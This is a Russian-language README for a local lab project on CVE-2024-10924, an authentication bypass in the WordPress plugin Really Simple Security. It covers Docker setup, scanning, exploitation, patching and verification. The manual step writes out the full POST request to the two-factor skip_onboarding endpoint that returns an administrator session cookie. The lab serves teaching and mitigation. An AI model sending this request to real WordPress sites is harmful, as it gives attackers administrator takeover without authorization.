
Демонстрирует эксплуатацию и смягчение CVE-2024-10924, обхода аутентификации в WordPress Really Simple Security, с автоматизированным Python-эксплойтом, ручными шагами в Burp Suite и проверкой исправления.
CVE-2024-10924 - Обход аутентификации в Really Simple Security
ОБЗОР
Этот проект демонстрирует эксплуатацию и устранение CVE-2024-10924, критической уязвимости обхода аутентификации в плагине WordPress "Really Simple Security".
ШАГ 1: НАСТРОЙКА СРЕДЫ
Запустите уязвимую среду WordPress: cd wordpress-really-simple-security-authn-bypass-vulnerable-application docker-compose up -d
Проверьте, что контейнеры запущены: docker ps
Доступ к WordPress: http://localhost:1337
Необходимые инструменты:
ШАГ 2: СКАНИРОВАНИЕ УЯЗВИМОСТЕЙ
Запустите сканирование GVM по цели:
ШАГ 3: ЭКСПЛУАТАЦИЯ
Метод A - Автоматизированный эксплойт на Python: python exploit.py
Метод B - Ручная эксплуатация через Burp Suite:
Перехватите трафик к http://localhost:1337
Отправьте POST-запрос: POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1 Host: localhost:1337 Content-Type: application/json
{"user_id": 1, "login_nonce": "hack", "redirect_to": "/wp-admin/"}
Наблюдайте ответ с заголовком Set-Cookie, содержащим сессию администратора
Ожидаемый результат:
ШАГ 4: УСТРАНЕНИЕ
Примените патч для блокировки уязвимой конечной точки: .\patch.ps1
Что это делает:
ШАГ 5: ПРОВЕРКА
Повторный запуск эксплойта (Метод A или B): python exploit.py
Ожидаемый результат после устранения:
ДОПОЛНИТЕЛЬНЫЕ ЗАМЕТКИ
Чтобы остановить среду: docker-compose down
Чтобы просмотреть журналы контейнеров: docker-compose logs -f
Для легитимного доступа к администрированию WordPress: http://localhost:1337/wp-admin (Проверьте docker-compose.yml для получения учётных данных)